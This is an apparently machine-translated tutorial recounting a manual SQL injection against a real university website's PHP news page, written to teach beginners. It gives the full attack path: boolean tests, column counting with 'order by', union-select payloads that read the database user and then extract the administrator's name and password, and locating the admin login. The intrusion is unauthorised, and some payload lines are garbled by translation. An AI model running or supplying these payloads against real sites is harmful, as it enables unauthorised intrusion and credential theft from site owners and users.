An incomplete php manual injection

Layne

A pure manual php injection was made to a university, mainly to instruct new users to learn php manual injection.

The newbie stays, and the old bird passes.

First, use google hack to find a php injection point on a university website: http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532.

I will not add an error behind the id value. I will directly add and 1 = 1 to check whether the returned page is normal. Return to page 1 .. Indicates that the return is normal.

Then change 1 = 1 to 1 = 2, that is, to make the query statement logical false. Let's take a look at the returned page. 2. A page error is returned.

Now the two pages are different. We basically decided that php injection exists.
The next step is to use the order by statement to guess the number of fields in the current database and prepare for the next step of the union query. The related statement is http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 order by 1. the number after Order by indicates that the table is sorted by the number of the fields queried by the current database. As long as the number after order by is smaller than the number of fields, the normal page is returned.
We submit http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 order by 1. sort by the first field and return the normal page. 3.

Then we will increase the number and submit it. When I submit it to http: // www. ** u.edu.cn/notice/newswin2.php? When id = 1532 order by 8, the error page is returned. When the page is submitted to 7, the returned page is normal. The conclusion is that there are 7 fields in total.
Okay. In this step, we start to use union to query all fields that are displayed on the webpage. Submit http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7. Page 4 is displayed.

Next, find text fields on several fields displayed on the web page, because if you display text in a numeric field, you must report an error. Here is the position corresponding to 4. Well, let's take a look at who the current user is and submit http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 and 1 = 2 union select 1, 2, 3, user (), 5, 6, 7, page 5.

The reader @ localhost of the current user is disclosed, which does not seem to be the root permission. If you are a root user, we can use the loadfile () function to crack the website source code and obtain sensitive information. This is not the root permission, so we can guess the Administrator account and password.
Now let's guess the table. Submit http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 and 1 = 2 union select, 7 from user. If the returned page is normal, the table exists. The last table I tested was named user, 6

Now let's determine if this account is an administrator. Because the administrator id is generally 1, http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 and 1 = 2 union select 1, 2, 3, userid, 5, 6, 7 from user to blow up the id value. 7. The Id value is 1, which should be administrator's.

In this step, you can guess the Administrator account and password. Set http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7 from user location 4 is replaced with a common user field name or password field name. If the returned page is normal, this field exists. Of course, you must be patient with manual detection. After repeated tests, the Administrator account field is name and the password field is passwd. Submit http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 and 1 = 2 union select 1, 2, 3, name, 5, 6, 7 from user, return to page 8.

Submit http: // www. ** u.edu.cn/notice/newswin2.php? Id = 1532 and 1 = 2 union select 1, 2, 3, passwd, 5, 6, 7 from user, return to interface 9.

In this way, the Administrator's account and password are obtained. Now let's look for the background, add an admin behind the link, and successfully jump out of the login window, although a little strange, 10.

Use the Administrator account and password to log on to the website. However, the university website seems to have configured an ip address logon restriction and cannot log on to the website. But I still need to post the manual injection process. Let's take a look at it for some help. Change the php suffix to Php and return an error page, which indicates that it is unix. Because unix is case sensitive and does not understand unix, I will not talk about the penetration of other methods on this site, this is what I want to express.